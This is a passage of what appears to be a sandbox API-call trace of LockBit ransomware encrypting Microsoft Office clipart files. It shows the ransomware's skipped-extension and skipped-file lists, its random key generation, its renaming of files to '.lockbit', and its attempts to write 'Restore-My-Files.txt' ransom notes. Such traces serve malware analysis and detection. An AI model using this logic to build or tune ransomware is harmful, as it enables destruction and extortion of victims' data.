lstrcmpiW (lpString1="iconcache.db", lpString2="J0105496.WMF") returned -1 [0138.949] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.949] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF") returned=".WMF" [0138.949] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.949] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.949] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.950] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.950] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF.lockbit") returned 72 [0138.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105496.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.951] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.951] malloc (_Size=0x40068) returned 0x3df0008 [0138.951] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5156) returned 1 [0138.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.952] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.956] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.956] malloc (_Size=0xa6) returned 0x77d7a8 [0138.956] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0138.957] free (_Block=0x77d7a8) [0138.957] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.957] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.957] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.957] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1560, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105502.WMF", cAlternateFileName="")) returned 1 [0138.957] lstrcmpiW (lpString1=".", lpString2="J0105502.WMF") returned -1 [0138.957] lstrcmpiW (lpString1="..", lpString2="J0105502.WMF") returned -1 [0138.957] PathFindExtensionW (pszPath="J0105502.WMF") returned=".WMF" [0138.957] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.957] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.958] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.958] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105502.WMF") returned 1 [0138.959] lstrcmpiW (lpString1="ntldr", lpString2="J0105502.WMF") returned 1 [0138.959] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105502.WMF") returned 1 [0138.959] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105502.WMF") returned -1 [0138.959] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105502.WMF") returned -1 [0138.959] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105502.WMF") returned 1 [0138.959] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105502.WMF") returned -1 [0138.959] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.959] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF") returned=".WMF" [0138.959] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.959] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.959] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.960] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.960] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF.lockbit") returned 72 [0138.960] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105502.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.961] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.961] malloc (_Size=0x40068) returned 0x3df0008 [0138.961] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5472) returned 1 [0138.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.962] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.962] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.966] malloc (_Size=0xa6) returned 0x77d7a8 [0138.966] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.967] free (_Block=0x77d7a8) [0138.967] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105502.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.967] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.967] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105504.WMF", cAlternateFileName="")) returned 1 [0138.968] lstrcmpiW (lpString1=".", lpString2="J0105504.WMF") returned -1 [0138.968] lstrcmpiW (lpString1="..", lpString2="J0105504.WMF") returned -1 [0138.968] PathFindExtensionW (pszPath="J0105504.WMF") returned=".WMF" [0138.968] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.968] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.969] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.969] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105504.WMF") returned 1 [0138.969] lstrcmpiW (lpString1="ntldr", lpString2="J0105504.WMF") returned 1 [0138.969] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105504.WMF") returned 1 [0138.969] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105504.WMF") returned -1 [0138.969] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105504.WMF") returned -1 [0138.969] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105504.WMF") returned 1 [0138.969] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105504.WMF") returned -1 [0138.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.970] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF") returned=".WMF" [0138.970] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.970] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.970] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.970] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF.lockbit") returned 72 [0138.971] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105504.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.972] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.972] malloc (_Size=0x40068) returned 0x3df0008 [0138.972] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4148) returned 1 [0138.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.973] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.978] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.978] malloc (_Size=0xa6) returned 0x77d7a8 [0138.978] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.980] free (_Block=0x77d7a8) [0138.980] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105504.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.980] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.980] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105506.WMF", cAlternateFileName="")) returned 1 [0138.980] lstrcmpiW (lpString1=".", lpString2="J0105506.WMF") returned -1 [0138.980] lstrcmpiW (lpString1="..", lpString2="J0105506.WMF") returned -1 [0138.980] PathFindExtensionW (pszPath="J0105506.WMF") returned=".WMF" [0138.980] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.980] lstrcmpiW 